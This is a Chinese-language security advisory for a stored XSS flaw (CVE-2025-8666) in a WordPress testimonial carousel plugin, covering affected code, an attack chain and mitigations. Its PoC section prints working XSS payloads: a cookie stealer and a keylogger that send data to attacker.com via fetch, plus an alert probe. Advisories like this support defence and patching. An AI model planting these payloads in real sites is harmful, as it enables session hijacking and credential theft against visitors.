CVE-2025-8666: WordPress Testimonial Carousel插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-8666

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Testimonial Carousel For Elementor (WordPress插件)

漏洞概述

CVE-2025-8666是WordPress插件Testimonial Carousel For Elementor中的一个高危安全漏洞。该插件版本小于或等于11.6.2时存在存储型跨站脚本(XSS)漏洞，攻击者可通过多个参数注入恶意Web脚本。由于该插件在处理用户输入时缺乏足够的输入清理和输出转义，攻击者可以利用此漏洞在包含受污染内容的页面中执行任意JavaScript代码。漏洞需要认证才能利用，但攻击者仅需拥有贡献者(contributor)级别或更高的权限即可发起攻击。一旦恶意脚本被注入，任何访问受影响页面的用户都会触发该脚本执行，可能导致会话劫持、敏感信息窃取或进一步的恶意操作。此漏洞由Wordfence安全团队于2025年10月25日披露，影响范围广泛，因为该插件被众多WordPress网站使用。

技术细节

该漏洞属于存储型跨站脚本攻击(SStored XSS)，源于插件对用户输入的验证和转义不足。攻击者通过利用多个Widget组件中的参数实现恶意脚本注入。受影响的组件包括：Animated Carousel的Coverflow和Cube渲染类(TestimonialscarouselCoverflow和TestimonialscarouselCube)、Section With Carousel的Cube类(SectionWithCube)以及Testimonials Carousel的Blog类(TestimonialscarouselBlog)。具体漏洞位置分布在多个PHP文件的多个行号，如class-testimonialscarousel-coverflow.php的1425和1443行、class-testimonialscarousel-cube.php的913行、class-section-with-cube.php的1167行以及class-testimonialscarousel-blog.php的1192行。攻击者通过在评论或轮播内容中嵌入包含JavaScript代码的Payload，当其他用户访问包含这些内容的页面时，浏览器会解析并执行注入的脚本。攻击者可以利用此漏洞窃取用户Cookie、劫持会话、执行钓鱼攻击或传播恶意软件。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress插件Testimonial Carousel For Elementor，并确认版本号<=11.6.2

STEP 2

步骤2: 账户获取

攻击者获取WordPress网站的有效账户，需要至少具有贡献者(Contributor)级别的权限

STEP 3

步骤3: 恶意Payload注入

通过插件的轮播组件(如Coverflow、Cube、Blog等)的输入参数，注入包含恶意JavaScript代码的Payload

STEP 4

步骤4: 数据持久化

恶意脚本被存储在数据库中，当页面渲染时从数据库读取并输出到前端HTML

STEP 5

步骤5: 触发执行

当其他用户访问包含恶意内容的页面时，浏览器解析HTML并执行注入的JavaScript代码

STEP 6

步骤6: 恶意活动

攻击者通过注入的脚本执行各种恶意活动，包括窃取Cookie、会话劫持、钓鱼攻击或传播恶意软件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-8666 Stored XSS PoC -->
<!-- This PoC demonstrates the stored XSS vulnerability in Testimonial Carousel For Elementor plugin -->
<!-- Requires contributor-level access or higher -->

<!-- Malicious payload to be injected via plugin parameters -->
<script>
  // Cookie stealing payload
  var stolenCookies = document.cookie;
  
  // Send cookies to attacker-controlled server
  fetch('https://attacker.com/collect?c=' + encodeURIComponent(stolenCookies), {
    method: 'GET',
    mode: 'no-cors'
  });
  
  // Session hijacking demonstration
  console.log('[CVE-2025-8666] Stolen cookies:', stolenCookies);
</script>

<!-- Alternative payload - Keylogger -->
<img src=x onerror='document.onkeypress=function(e){fetch("https://attacker.com/k?"+btoa(e.key))}'> 

<!-- Alternative payload - DOM manipulation -->
<svg/onload=alert(document.domain)>

影响范围

Testimonial Carousel For Elementor <= 11.6.2

防御指南

临时缓解措施

临时缓解措施：在无法立即升级插件的情况下，可采取以下措施：1) 暂时禁用Testimonial Carousel For Elementor插件；2) 限制用户注册和新账户创建，仅允许可信用户注册；3) 审查现有用户账户，移除不必要的贡献者级别账户；4) 使用安全插件监控可疑活动；5) 考虑使用Web应用防火墙规则阻止已知的XSS攻击模式。同时建议密切关注插件官方发布的安全更新，并在发布后尽快应用。